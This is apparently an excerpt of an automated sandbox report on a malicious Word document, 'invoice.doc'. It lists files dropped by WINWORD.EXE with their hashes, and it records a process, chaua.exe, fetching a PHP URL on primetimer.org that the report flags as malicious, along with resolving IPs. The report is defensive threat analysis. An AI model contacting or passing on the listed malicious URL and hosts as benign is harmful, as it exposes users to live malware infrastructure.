C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Throw.help.txt
text
MD5: b8c5970eb2ff62a8853d8bb7818f3d7f
SHA256: 7a684d77cde10addf0ecfa506a0d20bc69c4395a33e2eb9565cdb3a721e12a84
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Session_Configurations.help.txt
text
MD5: 8146b0eeb5cbc6f81fa7c5a594605619
SHA256: 2b598ae9c27625cf4e92bc87aaba0a7e19216adf1c3e00d28d792b526b569ee1
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_split.help.txt
text
MD5: f043457ffa8368c9aa4abb83bbf184f3
SHA256: 93d2f8789590177a75ba5a642f4cd1e5a92a1a9e4eb44f18a870f8341ea178f2
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Signing.help.txt
text
MD5: 347d106a0b234e6f7c714fb5c5e1cebc
SHA256: 29e6144b13bdb4e4f6ee990a05ff88733b1331b96f993fef348eccf6689628be
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Variables.help.txt
text
MD5: 4323f3895923d9863b52bf077b3c4054
SHA256: 7a98e56b6249e1b60425857d1c733fbd2cce0bf5e0848ce17e711f860851a6d2
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_trap.help.txt
text
MD5: b17bdcc8e7414428f11bfce93eccd0a8
SHA256: 743d625f624819d64b274ce3811e35ff41c8c65dd4de3e27e76dcd57ea812e78
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_script_blocks.help.txt
text
MD5: 2358193b0f5f79220dfbc03d7a505ac2
SHA256: 8636be3b0ec4679b49e44d4309e453fc9039d60c065fbb5dc467cd20e1fadea2
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Special_Characters.help.txt
text
MD5: 6eec4c5e1607a434fef0f6c9807343c2
SHA256: df6ef01ccf0614ed74e9a469266691fc5dfb3e23b13871394734a5b4275e91c0
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_script_internationalization.help.txt
text
MD5: f103bba2417482e5be5cfb258ad26cc6
SHA256: c1cc99c069e49d5ea153ffcaf9e2dd82ac0d2718c04673430d02e8adbf1dea1d
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_remote.help.txt
text
MD5: 69421c53ecc0e4ff792980ee25308582
SHA256: f02c47cd1b8a37cff1d6e54f15d1fc6f276f92497ec9e9d1f595698fb0c54144
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_requires.help.txt
text
MD5: 889cbc7ac1d723e66f09ce61380b46e9
SHA256: 7b58fb203cb4faad3923b70e39e570fe95251fd893210427c883ff9ae4077112
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_remote_FAQ.help.txt
text
MD5: db3b55bf4ccb6088f30c5b7fd67ac967
SHA256: 40de3059b29a805278fd96e2b3b18595010180538da937606113f3bc76db1a4c
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Reserved_Words.help.txt
text
MD5: 65c8d0fe33ec0a8124aab2494d8ec82e
SHA256: 90fad4f20b37e7c86de11741eceb68337be1c52f5631678d79661431d3a1b3a2
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_remote_troubleshooting.help.txt
text
MD5: 1bacdfd726f266e6e088224fe0b14b21
SHA256: 9beed907031ab92bcd7e43e17c93382ddcad378a2276f3e2f51008a5cbb04bdb
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_remote_jobs.help.txt
text
MD5: 2b9449d6f7bfab7adcbd7c2df999638d
SHA256: d20188c06d8abf31fb3f5d641ce0226a85063af8bb20046939b103562708b551
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\CVRA728.tmp.cvr
––
MD5:  ––
SHA256:  ––
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Return.help.txt
text
MD5: f9fa7df0fcc61cc286f0123e5dfce3c1
SHA256: 186300249a6de81a6ba1fddbfa6927dfcaebab0371ddfb180583126cd0b9c29a
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_regular_expressions.help.txt
text
MD5: 8cdb943f0be785d4ff09b767fa9aae72
SHA256: fa023b369ab994a58076ff6b973d783124ce13c69deb614d5980c7f6d92633c1
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_scripts.help.txt
text
MD5: 09f74326137427abc97c47918983e60a
SHA256: 13e8ac0907085c6b8f9ef11977533bfa0f76ef4e5f32b09a306836280d4cdaf8
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_scopes.help.txt
text
MD5: 696344c2f8c79c4cd76e9c61360817b4
SHA256: ba61159b055b683e5c4406342caaa557ac3c228c175a4f83b2bb1316dfb9dfd7
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Ref.help.txt
text
MD5: ea24480ed2044d9d5c0aafe278701d8a
SHA256: 10ff4b59cde544688d89ad07dc5e230658556ba187e2b378c8ae6a52752b0d69
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_remote_requirements.help.txt
text
MD5: c850cdb6e283b9194aa597d418412818
SHA256: 2b13987b0f7fa7ed66662bf4661f8f0f1f18778e9d78f9a869caa826c41de640
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_profiles.help.txt
text
MD5: 8d5da8c76b0d1b7bb6008aadb11f3905
SHA256: ddb621ba8624aafeb28a33a57248f18368b3f1e5b999637d29253def23b8d6f5
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_properties.help.txt
text
MD5: 33f20bf86e538531e63d438dd507d074
SHA256: 99ebbf2849ccdcbbdfc6d4d08a10ea17dfa61d7890a03107b531c00f0c38dfe2
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_providers.help.txt
text
MD5: 48b2fc4920cae7bef7958f3236fda34f
SHA256: 41adbafa18c051880e4e487d56c8ef4bdbbf72f10e2823993596aff8481c7777
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_pssession_details.help.txt
text
MD5: 9d0cecf572ac565927552bd659773d81
SHA256: 2d3fb06dd2edf4172e3702d886015f491128ab7a5ae826760196c729888d7fff
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_PSSnapins.help.txt
text
MD5: 74b82613f6a8d27e1c37e52137b91f6d
SHA256: 000e798faac3e5dc3686c386a0515ccd5c23f50f59b645fded1d6a9b7fd06c23
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_pssessions.help.txt
text
MD5: 78fda14f35ae390f32afc9ba9766bb78
SHA256: d65ec7906a1bcb8187e8aab371880a0bb52b99ad89e66bd3843a38331ae85c81
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_preference_variables.help.txt
text
MD5: 14d287caa7b2c85b4e29fe9fd070fcea
SHA256: c740fdb99bd6aa8edddce9837d34e317ae7d6f2a7b8057b708d1b5a0f4332d0a
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Quoting_Rules.help.txt
text
MD5: 664fcfdfb16222061e1922a7e5faff48
SHA256: d3ff393ca9e7eac03b4100d13708df42ae4d9e87a960593d54a5c32e0f0e92ff
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_prompts.help.txt
text
MD5: 2052b9df9dd514258d12f9c28cd8b9fc
SHA256: eaf5f3bbb64fe197ee63deb95f9f643d9c7b3135358929f93819a92175def42a
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Redirection.help.txt
text
MD5: 0f9f0cfef5ee3ec63edebf33b819b9b4
SHA256: eac4c83c40399c2293c757a2a9256beac8eeb7dbe0f0a2a828f361c6bcb82ce4
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_pipelines.help.txt
text
MD5: ea96217fa09366fb2aa409c053b4d600
SHA256: 25b371904f2b56eeba166379041c68fb9372875f6accf6cef668d47c6a0d9a05
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_objects.help.txt
text
MD5: eb466f74dbd492ac5e4e642151b29e13
SHA256: ecc728797338a52970872f9795128f7d2e1142cd42f4e67a28e27267b4b098e8
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_parameters.help.txt
text
MD5: bd7ea6bc90d01a0602f613da704da5bd
SHA256: 40ad4ed4d5c20a9c034adf54b8459b6f713b95ee9b9446310f9e01843722d3c0
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Path_Syntax.help.txt
text
MD5: ad60d27a0f5b7b6a9138c82a93b0928f
SHA256: 2c04701294f26e634297d7c0da90b8f68118444796757eba42ef4e088784af01
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_methods.help.txt
text
MD5: 6b43c71a84500386d5f27defd6565fa2
SHA256: 4f4607cfe8019088da7343c65cdeccf20f3b143d88d75f0a1e0d3213cd134f8a
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_join.help.txt
text
MD5: 81f6388a6beae9dc1255d05fd2c8646a
SHA256: 6c94e68a780ba445066c3453ab1bb6d71216e32d44282bd3c6228a121f5cf9f3
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_modules.help.txt
text
MD5: d5e0ab3b288a05cd5fc599e54b9be2d7
SHA256: 4896a7da09afa4ba971245023a1553616def5fe598eeb5d2c0a3576259f280f2
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_jobs.help.txt
text
MD5: e820b3afc4b36f28adad78b40d6c5a2d
SHA256: 772d3fe1423995399601cc11f89b2e4d9609baaeb83120c3fb294566f16d079c
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Line_Editing.help.txt
text
MD5: 990713f37dcc0aa688f78f4fbdb2b86c
SHA256: 668d5e7e4ed0e9551e9415bbc623e20955affaecf263360d0f1c77f1e8c180f2
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_logical_operators.help.txt
text
MD5: 8f9bc2797b95d1456a705b69819a828b
SHA256: 36ccd7847b33fa23d84da4a7e3d98821dc119c91534f5d1e53f9db6005fba41a
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_operators.help.txt
text
MD5: bba4d9d2698b576530f9337ccc056fc0
SHA256: abf5e9060b66b5a498cd735d8243a5111a2f37c82c326dd375c0bb5cd21627ef
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Language_Keywords.help.txt
text
MD5: 0ad599ac4f7c8906c0d229788e96254a
SHA256: ce445ae30da19371d775e9e43882793927a2872654fe4c270578a698348bae90
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Parsing.help.txt
text
MD5: 2209dcd8e1b1b3508404a93ae2b4dac2
SHA256: 5af6713ef8f416ef4bbd7c81fcb9caa1778ac4746ccab2eb1f7dcd254181cb08
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_job_details.help.txt
text
MD5: 2300489f3d24d182e0134470cce76158
SHA256: cad0edabb7a3b710c9df4bb2be03db8beaacb6527c26d9787d6f72d0a30f26dd
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_locations.help.txt
text
MD5: dacf3b0d8819b5f706b94db45c0ee402
SHA256: 34aaaa4de11397215cb2778462bd0a4d6b2e58f7b560b6f52aff405d2ee92ab2
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_History.help.txt
text
MD5: 5247459f303b12b74cf35c88ba7679f0
SHA256: 5075e80ec46ab03b51a041de1ef88bced94aff35791c4810cdded71661863ca3
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_functions_cmdletbindingattribute.help.txt
text
MD5: 0aa24c2ac8720c212bd2f73b100ab4e8
SHA256: f6a22568067c8eface6e0597c43374af3506ba73173a6e3daf2ba495dbc950de
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_functions_advanced.help.txt
text
MD5: 5b4ae14fe4ff47bf87e7b768dc46ce03
SHA256: 5306ebfdf7918c8bd9100a1e840662d33b0109f8e0ef852d23c3c17467e7f88d
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Foreach.help.txt
text
MD5: a012634c19a188800968ece8a2a74385
SHA256: ba65881c4b99034c7319c40e4145dd22872e8acc6b6f886eb95de4b252324caf
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_For.help.txt
text
MD5: 18cc7f5e7435194b0dad8ee8dd3a1793
SHA256: 7366e7ca7cb79bb18c18a8f408840cfc0a84ce9ed915001376a0e6f716edfeb9
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_eventlogs.help.txt
text
MD5: 59c7512b5261ac5d0a02fcc3e6fd077c
SHA256: c5999028e774c6535b17ada9893d684278810dfd8da82d60e3b812d22be09256
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_format.ps1xml.help.txt
text
MD5: ebf6b26a926e6e9cd418b507698e0af3
SHA256: 52a7f15822fefa602bd7b125de0ea03becaa4e5c8bdd0346f849c688667abca1
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_functions.help.txt
text
MD5: 7b29ab9dcf5e59eb86f8c030b395af79
SHA256: 5bf2e0c2b3d8f44385dab3edddcf39527f3cadf162358919362fa41abe147865
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_escape_characters.help.txt
text
MD5: ba3da2ae40d346973a66ff105ca7cef3
SHA256: 19bd5c33a0c354716df01a651195c552696b4b62ec745661789fc36644e5e15d
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_functions_advanced_methods.help.txt
text
MD5: 68ab90b7dab1a5f9b37c469c72e84096
SHA256: d6f7acf2d9741613094c09f956cbb2f82bd89318223095829faab40d4d476eec
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_If.help.txt
text
MD5: 5ed2ac359cca7cc708694b6a676384a0
SHA256: 3ad7fd0279f054e1992415f47e6e16b147485ab82bad6038f05aff5f2c5605b9
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_execution_policies.help.txt
text
MD5: f82cde32b45bea260dfcefb28c72ce9e
SHA256: a261adbb9aae03c76d0678dda45997ea0d97b24b04ba3f17f9f56963903aa7b2
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_hash_tables.help.txt
text
MD5: 8b6304c033642b3864f52c9772a95950
SHA256: 402b062fb414c3389b6fc02b7c052efed071ee90df609613d00c7d3cd37d86ba
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_functions_advanced_parameters.help.txt
text
MD5: dd3a21a98a0c62745e9a09f165d24676
SHA256: 7380ce7bb8e9b3e87ba91b25cca7d47aed75846bf62faae4efffdf6e816fdae6
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_environment_variables.help.txt
text
MD5: 592117f8ddd831da25bebe6e2fc58eb2
SHA256: 447081fbed7cc935ef69613592032f75da4d002c9948e16c4f9f628e4c880ee4
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Comparison_Operators.help.txt
text
MD5: 409ed6be5314bac97afc88aca11725a8
SHA256: 613eba45d12113b49d942ff9cfc939f0f5c8cabb819b5b3bd47b7a4f9e719d48
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Command_Syntax.help.txt
text
MD5: 847b0c3a6010660492ecc1d88a69210d
SHA256: 7d7ee4469ae76392317dc7e16e716b5767bd7eefcdc39f60c51ed1da2e99ae2b
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Core_Commands.help.txt
text
MD5: 9ddd0d75db8b8d52e1bd4474ed24582f
SHA256: a7743fc735a6887cb51a51fb26e57fd0ed858cbae9844242b49a6c80d7afa45c
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Comment_Based_Help.help.txt
text
MD5: 8d7e5ad25683e71cd1dfe4949a754bc5
SHA256: a653702f520d12525099f8c7ff70a92d812c3dd3965d2d4953c2fa6840916ecd
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Continue.help.txt
text
MD5: 2775518b0c0896a3b88c7ea577acffc3
SHA256: dae6b448ee1a5696ad66f43a053dba37f6c20f0fe1008ce35f4fdf440b0f4100
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_CommonParameters.help.txt
text
MD5: bd04b34656edf637080e5b39ac179450
SHA256: 5aa4d407219915fb2f87fac21e309e9933cc98b6394a3b3d4873f5c139c48da1
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_data_sections.help.txt
text
MD5: 4749443816fde8b533b18b8e80a86f53
SHA256: cbb6bde551361f88226276c8135102ba712dd50225a90cf0bf57cee0dbf9a758
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_do.help.txt
text
MD5: 490344bc575a1f2fe43aa0785b20cbe1
SHA256: 18eff25c341bd276707758467b5a2279b1f1fe43703786505803434586c8d134
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_debuggers.help.txt
text
MD5: dd41e5d943f66bc0ce48eeb0376a398e
SHA256: be9f4b6ba21efb0f13cb47a0f90fe8c23b36ae56c433ecb460f354144ab18b84
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Modules\BitsTransfer\en-US\Microsoft.BackgroundIntelligentTransfer.Management.dll-Help.xml
xml
MD5: 3f3d8394d810834f7ee9c637fc6bde6b
SHA256: 27a67bc6d62fb41d111123fa5fb4a8c0f934d52cefd9afc98221e99cce41c39c
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Arithmetic_Operators.help.txt
text
MD5: 04d0cdc53b434b3fe0022831c9d06a84
SHA256: d42c3639dc7e4816800b1221e74f682bc3e6c8f34d00cc4765b3adebc173bbba
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Automatic_Variables.help.txt
text
MD5: 96a664e1a1ee05b3a0c24d3187f9a1a9
SHA256: f6f0ce7433667264eb7483b8c5ef62bec39cc4f3e7d24378471af28cd458fed7
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Assignment_Operators.help.txt
text
MD5: d2dd0c7c3423cdc0040b68fbc475428e
SHA256: 4da2f663032a15d4ecb7a6fcb6df8d5c07d097ed8d3fa9ec054d676584c4b411
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_arrays.help.txt
text
MD5: 04bb4aa2cf5a5d3ead1d9f6eea89c034
SHA256: 0c058df25203e39d339f127c0ae8235ee3e2e77f33b57f894e8e5a4ae6243ec8
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_aliases.help.txt
text
MD5: dccde3d3fa7a378dab091d3b78e393cb
SHA256: 5dd570caa907247bac82b722b453619adc88063c238b294154939481c134b140
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Diagnostics.Format.ps1xml
text
MD5: ff6eeb8125b9265c5ba40af9f7c6f6bc
SHA256: 7d569c1155cfa9b7bb2ba225ee409a55c8b0e8217f3a7e05baa39da1bd7c4689
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_command_precedence.help.txt
text
MD5: 9b204318b2747400638fe5028e376100
SHA256: a79d0811c03feb6129802426f53799cba1a93c4bd204ce33e55bc180d3f0f132
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Certificate.format.ps1xml
xml
MD5: c93a361112351b30e2c959e72789952d
SHA256: 4379bd59c1328a6811584d424df3dc193a5d607e2859d3ac1655b9124a5f100d
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\DotNetTypes.format.ps1xml
xml
MD5: 1ab2fd4b6749ad6831c86411fdcafb48
SHA256: 98540086cfc986d7604ffded977ef20944d1715bf8453809ce736c919cb6e1ef
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Break.help.txt
text
MD5: aedbfc39660ae3e030761ed4782ce328
SHA256: 13231768182599ec2c15b281f5e313e36428327479da7f05ff8a92c5479214f2
2916
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: 7b84a1b98d4fa5d7d8643c8e5c2240cd
SHA256: e703ac9516525a41b7c1fae95753b8f4ee2b37e5ace99a9a18589f040ae7aefb
2916
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\invoice.doc.LNK
lnk
MD5: 774b77253443bf68292397b4257e3c33
SHA256: 5c64c7624437f2b34d6d786e5d5913addd6b62d8c1187229fc4fbff748643530
2916
WINWORD.EXE
C:\Users\admin\Desktop\~$nvoice.doc
pgc
MD5: 3f911e6d8515d8d512ce9b2c8d8c5a2e
SHA256: cfe914353ea42faa8bbd49a23e7897b23a2e7cf205ff581ef1db4bfe93924b6c
2916
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
pgc
MD5: 8cb2d1bce7de3585dc8a41170f08ff04
SHA256: 4c13169cfa4154f5b440238020681e44d341c386d842bfcae3a5cbd903356d51
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6AB743EE-532C-4517-8A71-7029BE4923F5}.tmp
––
MD5:  ––
SHA256:  ––

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
700 chaua.exe GET –– 77.85.38.18:80 http://primetimer.org/XkqQkPWluO.php BG
––
––
malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
700 chaua.exe 77.85.38.18:80 Vivacom BG unknown

DNS requests

Domain IP Reputation
primetimer.org 77.85.38.18
78.100.245.97
109.199.157.158
79.121.73.1
84.238.146.82
91.201.175.46
91.139.196.113
41.204.244.84
197.255.225.249
193.107.99.167
malicious

Threats

No threats detected.

Debug output strings

No debug info.